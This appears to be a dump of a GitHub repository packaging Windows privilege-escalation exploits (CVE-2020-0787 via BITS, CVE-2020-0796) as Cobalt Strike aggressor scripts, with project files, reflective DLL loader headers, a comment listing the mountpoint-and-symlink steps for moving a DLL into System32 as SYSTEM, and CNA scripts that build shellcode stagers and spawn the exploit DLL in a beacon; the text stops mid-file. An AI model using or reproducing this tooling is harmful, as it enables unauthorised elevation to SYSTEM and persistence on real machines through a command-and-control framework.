_WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) 225 | 226 | 227 | 228 | 229 | _WIN64;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) 230 | Level3 231 | Disabled 232 | MultiThreadedDebug 233 | 234 | 235 | 236 | 237 | 238 | 239 | 240 | 241 | 242 | 243 | 244 | 245 | 246 | {36c758eb-8c26-4dd6-915e-7030275418a5} 247 | 248 | 249 | 250 | 251 | 252 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/reflective_dll.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | 14 | 15 | Source Files 16 | 17 | 18 | Source Files 19 | 20 | 21 | 22 | 23 | Header Files 24 | 25 | 26 | Header Files 27 | 28 | 29 | Header Files 30 | 31 | 32 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/reflective_dll.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/src/BitsArbitraryFileMove.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | /* 4 | 0) Prepare workspace 5 | Create C:\workspace\ 6 | Create C:\workspace\mountpoint\ 7 | Create C:\workspace\bait\ 8 | Create C:\workspace\FakeDll.dll 9 | 10 | C:\workspace 11 | |__ mountpoint 12 | |__ redir 13 | |__ FakeDll.dll 14 | 15 | 1) Create a mountpoint 16 | C:\workspace\mountpoint\ -> C:\workspace\bait\ 17 | 18 | 2) Create the group / job / add file / etc. 19 | LocalFile = C:\workspace\mountpoint\test.txt 20 | 21 | At this point, a tmp file should have been created with user impersonation 22 | C:\workspace\bait\BITD857.tmp 23 | 24 | 3) Set an oplock on the tmp file 25 | C:\workspace\bait\BITD857.tmp 26 | 27 | 4) Resume the job 28 | The oplock will be triggered on the write operation as user 29 | 30 | 5) Switch the mountpoint and create symlinks 31 | C:\workspace\mountpoint\ -> \RPC Control 32 | \RPC Control\BITD857.tmp -> \??\C:\workspace\FakeDll.dll 33 | \RPC Control\test.txt -> \??\C:\Windows\System32\FakeDll.dll 34 | 35 | 6) Release the oplock 36 | The MoveFileW operation should be done as System 37 | */ 38 | 39 | #include 40 | #include 41 | 42 | #define MAX_FILENAME 32 43 | #define MAX_MSG 1024 44 | 45 | class BitsArbitraryFileMove 46 | { 47 | private: 48 | BOOL m_bCustomSourceFile; 49 | WCHAR m_wszWorkspaceDirPath[MAX_PATH]; 50 | WCHAR m_wszMountpointDirPath[MAX_PATH]; 51 | WCHAR m_wszBaitDirPath[MAX_PATH]; 52 | WCHAR m_wszSourceFilePath[MAX_PATH]; 53 | WCHAR m_wszTargetFilePath[MAX_PATH]; 54 | WCHAR m_wszBitsLocalFileName[MAX_FILENAME]; 55 | WCHAR m_wszBitsTempFileName[MAX_FILENAME]; 56 | WCHAR m_wszBitsTempFilePath[MAX_PATH]; 57 | 58 | public: 59 | // Constructor / Destructor 60 | BitsArbitraryFileMove(); 61 | ~BitsArbitraryFileMove(); 62 | 63 | public: 64 | BOOL Run(LPCWSTR pwszDstFile); // e.g.: Destination="C:\Windows\System32\FakeDll.dll" 65 | BOOL Run(LPCWSTR pwszSrcFile, LPCWSTR pwszDstFile); // e.g.: Source="C:\Workspace\FakeDll.dll", Destination="C:\Windows\System32\FakeDll.dll" 66 | void PrintSuccess(LPCWSTR pwszMsg); 67 | 68 | private: 69 | BOOL PrepareWorkspace(); 70 | BOOL WriteSourceFile(); 71 | BOOL FindBitsTempFile(); 72 | BOOL TargetFileExists(); 73 | void CleanUp(); 74 | }; 75 | 76 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/src/ReflectiveDLLInjection.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 30 | //===============================================================================================// 31 | #define WIN32_LEAN_AND_MEAN 32 | #include 33 | 34 | // we declare some common stuff in here... 35 | 36 | #define DLL_QUERY_HMODULE 6 37 | 38 | #define DEREF( name )*(UINT_PTR *)(name) 39 | #define DEREF_64( name )*(DWORD64 *)(name) 40 | #define DEREF_32( name )*(DWORD *)(name) 41 | #define DEREF_16( name )*(WORD *)(name) 42 | #define DEREF_8( name )*(BYTE *)(name) 43 | 44 | typedef ULONG_PTR (WINAPI * REFLECTIVELOADER)( VOID ); 45 | typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID ); 46 | 47 | #define DLLEXPORT __declspec( dllexport ) 48 | 49 | //===============================================================================================// 50 | #endif 51 | //===============================================================================================// 52 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/src/ReflectiveLoader.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H 29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H 30 | //===============================================================================================// 31 | #define WIN32_LEAN_AND_MEAN 32 | #include 33 | #include 34 | #include 35 | 36 | #include "ReflectiveDLLInjection.h" 37 | 38 | typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR ); 39 | typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR ); 40 | typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD ); 41 | typedef DWORD (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG ); 42 | 43 | #define KERNEL32DLL_HASH 0x6A4ABC5B 44 | #define NTDLLDLL_HASH 0x3CFA685D 45 | 46 | #define LOADLIBRARYA_HASH 0xEC0E4E8E 47 | #define GETPROCADDRESS_HASH 0x7C0DFCAA 48 | #define VIRTUALALLOC_HASH 0x91AFCA54 49 | #define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8 50 | 51 | #define IMAGE_REL_BASED_ARM_MOV32A 5 52 | #define IMAGE_REL_BASED_ARM_MOV32T 7 53 | 54 | #define ARM_MOV_MASK (DWORD)(0xFBF08000) 55 | #define ARM_MOV_MASK2 (DWORD)(0xFBF08F00) 56 | #define ARM_MOVW 0xF2400000 57 | #define ARM_MOVT 0xF2C00000 58 | 59 | #define HASH_KEY 13 60 | //===============================================================================================// 61 | #pragma intrinsic( _rotr ) 62 | 63 | __forceinline DWORD ror( DWORD d ) 64 | { 65 | return _rotr( d, HASH_KEY ); 66 | } 67 | 68 | __forceinline DWORD hash( char * c ) 69 | { 70 | register DWORD h = 0; 71 | do 72 | { 73 | h = ror( h ); 74 | h += *c; 75 | } while( *++c ); 76 | 77 | return h; 78 | } 79 | //===============================================================================================// 80 | typedef struct _UNICODE_STR 81 | { 82 | USHORT Length; 83 | USHORT MaximumLength; 84 | PWSTR pBuffer; 85 | } UNICODE_STR, *PUNICODE_STR; 86 | 87 | // WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY 88 | //__declspec( align(8) ) 89 | typedef struct _LDR_DATA_TABLE_ENTRY 90 | { 91 | //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry. 92 | LIST_ENTRY InMemoryOrderModuleList; 93 | LIST_ENTRY InInitializationOrderModuleList; 94 | PVOID DllBase; 95 | PVOID EntryPoint; 96 | ULONG SizeOfImage; 97 | UNICODE_STR FullDllName; 98 | UNICODE_STR BaseDllName; 99 | ULONG Flags; 100 | SHORT LoadCount; 101 | SHORT TlsIndex; 102 | LIST_ENTRY HashTableEntry; 103 | ULONG TimeDateStamp; 104 | } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; 105 | 106 | // WinDbg> dt -v ntdll!_PEB_LDR_DATA 107 | typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes 108 | { 109 | DWORD dwLength; 110 | DWORD dwInitialized; 111 | LPVOID lpSsHandle; 112 | LIST_ENTRY InLoadOrderModuleList; 113 | LIST_ENTRY InMemoryOrderModuleList; 114 | LIST_ENTRY InInitializationOrderModuleList; 115 | LPVOID lpEntryInProgress; 116 | } PEB_LDR_DATA, * PPEB_LDR_DATA; 117 | 118 | // WinDbg> dt -v ntdll!_PEB_FREE_BLOCK 119 | typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes 120 | { 121 | struct _PEB_FREE_BLOCK * pNext; 122 | DWORD dwSize; 123 | } PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; 124 | 125 | // struct _PEB is defined in Winternl.h but it is incomplete 126 | // WinDbg> dt -v ntdll!_PEB 127 | typedef struct __PEB // 65 elements, 0x210 bytes 128 | { 129 | BYTE bInheritedAddressSpace; 130 | BYTE bReadImageFileExecOptions; 131 | BYTE bBeingDebugged; 132 | BYTE bSpareBool; 133 | LPVOID lpMutant; 134 | LPVOID lpImageBaseAddress; 135 | PPEB_LDR_DATA pLdr; 136 | LPVOID lpProcessParameters; 137 | LPVOID lpSubSystemData; 138 | LPVOID lpProcessHeap; 139 | PRTL_CRITICAL_SECTION pFastPebLock; 140 | LPVOID lpFastPebLockRoutine; 141 | LPVOID lpFastPebUnlockRoutine; 142 | DWORD dwEnvironmentUpdateCount; 143 | LPVOID lpKernelCallbackTable; 144 | DWORD dwSystemReserved; 145 | DWORD dwAtlThunkSListPtr32; 146 | PPEB_FREE_BLOCK pFreeList; 147 | DWORD dwTlsExpansionCounter; 148 | LPVOID lpTlsBitmap; 149 | DWORD dwTlsBitmapBits[2]; 150 | LPVOID lpReadOnlySharedMemoryBase; 151 | LPVOID lpReadOnlySharedMemoryHeap; 152 | LPVOID lpReadOnlyStaticServerData; 153 | LPVOID lpAnsiCodePageData; 154 | LPVOID lpOemCodePageData; 155 | LPVOID lpUnicodeCaseTableData; 156 | DWORD dwNumberOfProcessors; 157 | DWORD dwNtGlobalFlag; 158 | LARGE_INTEGER liCriticalSectionTimeout; 159 | DWORD dwHeapSegmentReserve; 160 | DWORD dwHeapSegmentCommit; 161 | DWORD dwHeapDeCommitTotalFreeThreshold; 162 | DWORD dwHeapDeCommitFreeBlockThreshold; 163 | DWORD dwNumberOfHeaps; 164 | DWORD dwMaximumNumberOfHeaps; 165 | LPVOID lpProcessHeaps; 166 | LPVOID lpGdiSharedHandleTable; 167 | LPVOID lpProcessStarterHelper; 168 | DWORD dwGdiDCAttributeList; 169 | LPVOID lpLoaderLock; 170 | DWORD dwOSMajorVersion; 171 | DWORD dwOSMinorVersion; 172 | WORD wOSBuildNumber; 173 | WORD wOSCSDVersion; 174 | DWORD dwOSPlatformId; 175 | DWORD dwImageSubsystem; 176 | DWORD dwImageSubsystemMajorVersion; 177 | DWORD dwImageSubsystemMinorVersion; 178 | DWORD dwImageProcessAffinityMask; 179 | DWORD dwGdiHandleBuffer[34]; 180 | LPVOID lpPostProcessInitRoutine; 181 | LPVOID lpTlsExpansionBitmap; 182 | DWORD dwTlsExpansionBitmapBits[32]; 183 | DWORD dwSessionId; 184 | ULARGE_INTEGER liAppCompatFlags; 185 | ULARGE_INTEGER liAppCompatFlagsUser; 186 | LPVOID lppShimData; 187 | LPVOID lpAppCompatInfo; 188 | UNICODE_STR usCSDVersion; 189 | LPVOID lpActivationContextData; 190 | LPVOID lpProcessAssemblyStorageMap; 191 | LPVOID lpSystemDefaultActivationContextData; 192 | LPVOID lpSystemAssemblyStorageMap; 193 | DWORD dwMinimumStackCommit; 194 | } _PEB, * _PPEB; 195 | 196 | typedef struct 197 | { 198 | WORD offset:12; 199 | WORD type:4; 200 | } IMAGE_RELOC, *PIMAGE_RELOC; 201 | //===============================================================================================// 202 | #endif 203 | //===============================================================================================// 204 | -------------------------------------------------------------------------------- /CVE-2020-0796_CNA/CVE_2020_0796_CNA_4.0.cna: -------------------------------------------------------------------------------- 1 | sub CVE_2020_0796 { 2 | local('$stager $arch $dll'); 3 | if (!-is64 $1) { 4 | berror($1, "cve-2020-0796 exploit is x64 only"); 5 | return; 6 | } 7 | btask($1, "Task Beacon to run " . listener_describe($2) . " via CVE-2020-0796"); #KB4551762 8 | $arch = "x64"; 9 | $dll = getFileProper(script_resource("modules"), "CVE_2020_0796.dll"); 10 | $stager = transform(shellcode($2, false, $arch),"hex"); 11 | bdllspawn!($1, $dll,$stager, "Elevation of local privileges", 5000); 12 | beacon_link($1, $null, $2, $arch); 13 | 14 | } 15 | beacon_exploit_register("CVE_2020_0796", "CVE-2020-0796", &CVE_2020_0796); 16 | -------------------------------------------------------------------------------- /CVE-2020-0796_CNA/CVE_2020_0796_CNA_4.2.cna: -------------------------------------------------------------------------------- 1 | #cs4.2 2 | sub CVE_2020_0796 { 3 | local('$stager'); 4 | foreach $key => $value (binfo($1)) { 5 | println("$[15]key $value"); 6 | } 7 | $winbuild = binfo($1, "build"); 8 | show_message($winbuild); 9 | if ($winbuild != 18362 && $winbuild != 18363) { 10 | berror($1, "This exploit only supports Windows 10 versions 1903 - 1909"); 11 | return; 12 | } 13 | if (!-is64 $1) { 14 | berror($1, "cve-2020-0796 exploit is x64 only"); 15 | return; 16 | } 17 | btask($1, "Task Beacon to run " . listener_describe($2) . " cve-2020-0796"); 18 | $stager = payload_local($1, $2, "x64", "thread"); 19 | $stager = pack("I-", strlen($stager)) . $stager; 20 | $dll = getFileProper(script_resource("modules"), "reflective_dll.x64.dll"); 21 | #bdllspawn!($1, getFileProper(script_resource("modules"), "reflective_dll.x64.dll"), $stager, "cve-2020-0796", 5000); 22 | #beacon_link($1, $null, $3['listener']); 23 | } 24 | beacon_exploit_register("CVE_2020_0796", "CVE-2020-0796", &CVE_2020_0796); 25 | -------------------------------------------------------------------------------- /CVE-2020-0796_CNA/README.md: -------------------------------------------------------------------------------- 1 | # Cobalt Strike CVE-2020-0796 CNA 2 | 3 | #### 1.Compiled source code,copy dll to modules/CVE_2020_0796.dll. 4 | 5 | #### 2.Use Cobalt_Strike Load cna. 6 | ![](https://cdn.jsdelivr.net/gh/yanghaoi/ReflectiveDllSource/CVE-2020-0796_CNA/images/RUN.gif) 7 | 8 | #### 3.Get Test OS: 9 | Get iso:https://msdn.itellyou.cn/ , cn_windows_10_consumer_editions_version_1909_x64_dvd_76365bf8.iso 10 | 11 | ed2k://|file|cn_windows_10_consumer_editions_version_1909_x64_dvd_76365bf8.iso|5381154816|6A56DE112B164EC054D1104C53F8F10B|/ 12 | 13 | #### 4. Pages 14 | [CVE_2020_0796_LPE](https://yanghaoi.github.io/2021/04/22/cobalt-strike-cha-jian-zhi-cve-2020-0796-ti-quan-jiao-ben-kai-fa/) 15 | 16 | 17 | -------------------------------------------------------------------------------- /CVE-2020-0796_CNA/images/RUN.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yanghaoi/ReflectiveDllSource/f554823e63146c5b3c9c64ab0f051964e3491697/CVE-2020-0796_CNA/images/RUN.gif -------------------------------------------------------------------------------- /CVE-2020-0796_CNA/reflective_dll.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30503.244 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|ARM = Debug|ARM 11 | Debug|Win32 = Debug|Win32 12 | Debug|x64 = Debug|x64 13 | Release|ARM = Release|ARM 14 | Release|Win32 = Release|Win32 15 | Release|x64 = Release|x64 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.ActiveCfg = Release|x64 19 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|x64 20 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.ActiveCfg = Release|x64 21 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.Build.0 = Release|x64 22 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.ActiveCfg = Release|x64 23 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|x64 24 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.ActiveCfg = Release|x64 25 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.Build.0 = Release|x64 26 | EndGlobalSection 27 | GlobalSection(SolutionProperties) = preSolution 28 | HideSolutionNode = FALSE 29 | EndGlobalSection 30 | GlobalSection(ExtensibilityGlobals) = postSolution 31 | SolutionGuid = {F460160A-E250-413C-B7FD-6E69491ABB24} 32 | EndGlobalSection 33 | EndGlobal 34 | -------------------------------------------------------------------------------- /CVE-2020-0796_CNA/reflective_dll.vcproj: -------------------------------------------------------------------------------- 1 | 2 | 11 | 12 | 15 | 18 | 19 | 20 | 21 | 22 | 29 | 32 | 35 | 38 | 41 | 44 | 55 | 58 | 61 | 64 | 71 | 74 | 77 | 80 | 83 | 86 | 89 | 92 | 93 | 100 | 103 | 106 | 109 | 112 | 116 | 127 | 130 | 133 | 136 | 143 | 146 | 149 | 152 | 155 | 158 | 161 | 164 | 165 | 173 | 176 | 179 | 182 | 185 | 188 | 200 | 203 | 206 | 209 | 218 | 221 | 224 | 227 | 230 | 233 | 236 | 240 | 241 | 249 | 252 | 255 | 258 | 261 | 265 | 280 | 283 | 286 | 289 | 299 | 302 | 305 | 308 | 311 | 314 | 317 | 321 | 322 | 323 | 324 | 325 | 326 | 331 | 334 | 335 | 338 | 339 | 340 | 345 | 348 | 349 | 352 | 353 | 354 | 355 | 356 | 357 | 358 | -------------------------------------------------------------------------------- /CVE-2020-0796_CNA/reflective_dll.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Release 6 | x64 7 | 8 | 9 | 10 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949} 11 | reflective_dll 12 | Win32Proj 13 | 10.0 14 | 15 | 16 | 17 | DynamicLibrary 18 | v142 19 | MultiByte 20 | false 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | <_ProjectFileVersion>11.0.50727.1 31 | 32 | 33 | $(SolutionDir)$(Platform)\$(Configuration)\ 34 | $(Platform)\$(Configuration)\ 35 | false 36 | false 37 | $(ProjectName).x64 38 | false 39 | 40 | 41 | 42 | X64 43 | 44 | 45 | MinSpace 46 | OnlyExplicitInline 47 | true 48 | Size 49 | false 50 | WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) 51 | MultiThreadedDLL 52 | true 53 | 54 | Level3 55 | ProgramDatabase 56 | CompileAsCpp 57 | false 58 | 59 | 60 | $(OutDir)$(ProjectName).x64.dll 61 | false 62 | Windows 63 | true 64 | true 65 | MachineX64 66 | 67 | 68 | copy $(OutDir)$(ProjectName).x64.dll ..\bin\ 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | -------------------------------------------------------------------------------- /CVE-2020-0796_CNA/reflective_dll.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | 14 | 15 | Source Files 16 | 17 | 18 | Source Files 19 | 20 | 21 | 22 | 23 | Header Files 24 | 25 | 26 | Header Files 27 | 28 | 29 | Header Files 30 | 31 | 32 | -------------------------------------------------------------------------------- /CVE-2020-0796_CNA/reflective_dll.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /CVE-2020-0796_CNA/src/ReflectiveDLLInjection.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 30 | //===============================================================================================// 31 | #define WIN32_LEAN_AND_MEAN 32 | #include 33 | 34 | // we declare some common stuff in here... 35 | 36 | #define DLL_QUERY_HMODULE 6 37 | 38 | #define DEREF( name )*(UINT_PTR *)(name) 39 | #define DEREF_64( name )*(DWORD64 *)(name) 40 | #define DEREF_32( name )*(DWORD *)(name) 41 | #define DEREF_16( name )*(WORD *)(name) 42 | #define DEREF_8( name )*(BYTE *)(name) 43 | 44 | typedef ULONG_PTR (WINAPI * REFLECTIVELOADER)( VOID ); 45 | typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID ); 46 | 47 | #define DLLEXPORT __declspec( dllexport ) 48 | 49 | //===============================================================================================// 50 | #endif 51 | //===============================================================================================// 52 | -------------------------------------------------------------------------------- /CVE-2020-0796_CNA/src/ReflectiveLoader.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H 29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H 30 | //===============================================================================================// 31 | #define WIN32_LEAN_AND_MEAN 32 | #include 33 | #include 34 | #include 35 | 36 | #include "ReflectiveDLLInjection.h" 37 | 38 | typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR ); 39 | typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR ); 40 | typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD ); 41 | typedef DWORD (NTAPI * 